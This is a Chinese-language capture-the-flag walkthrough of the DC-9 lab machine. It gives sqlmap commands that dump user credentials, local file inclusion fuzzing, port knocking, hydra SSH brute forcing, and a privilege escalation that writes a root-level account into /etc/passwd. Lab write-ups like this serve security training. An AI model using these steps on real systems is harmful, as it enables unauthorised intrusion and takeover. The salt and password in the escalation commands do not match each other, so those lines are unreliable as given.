靶机渗透DC-9
扫描
在Search界面
无论输入什么,点击之后都是返回到results.php的界面。直接SQLMap跑一下。
sqlmap -u http://192.168.70.166/results.php --data="search=1" --dbs
sqlmap -u http://192.168.70.166/results.php --data="search=1" -D Staff --tables
sqlmap -u http://192.168.70.166/results.php --data="search=1" -D Staff -T Users --columns
sqlmap -u http://192.168.70.166/results.php --data="search=1" -D Staff -T Users -C Username,Password --dump密码以md5加密,解密一下。
去网站登陆,可以成功登陆。
也没什么不一样的,除了下面的File does not exist
猜测是LFI,直接在url处拼接../
Burp进行Fuzz。
/knockd.conf
查了一下knockd.conf是一种端口试探服务器工具,根据提示的7469、8475、9842,nmap扫描
按顺序扫描一遍之后,再扫描22端口。
发现22ssh端口已经成功开启了。
这时候用到之前SQLMap跑出来的用户名了。
hydra爆破
hydra -L user.txt -P pwd.txt ssh://192.168.70.166爆到两个用户密码。ssh尝试登陆。
在joeyt里面没什么东西,在janitor里面发现一个密码文件。
再去爆破
爆到一个新用户fredf的密码,登陆。
成功登陆。
老规矩,sudo -l看看。
无需密码就可以执行一个文件,去看看。
是个python文件。通过这个程序可以以root权限合并文件内容,直接进行提权。
openssh生成
openssl passwd -1 -salt hk HacK
echo 'hk:$1$xl$bvz59wqTT5z0GPenBl09W.:0:0::/root:/bin/bash' > /tmp/hk
sudo ./test/ /tmp/hk /etc/passwd
su hk
Hack
成功提权为root。找到flag即可。
结语
至此DC九关就都完成了。
过程中并不是一帆风顺,常常卡在一个地方好久
每一个关卡都不止一种解法。
等待你去尝试。
举报
腾讯云开发者
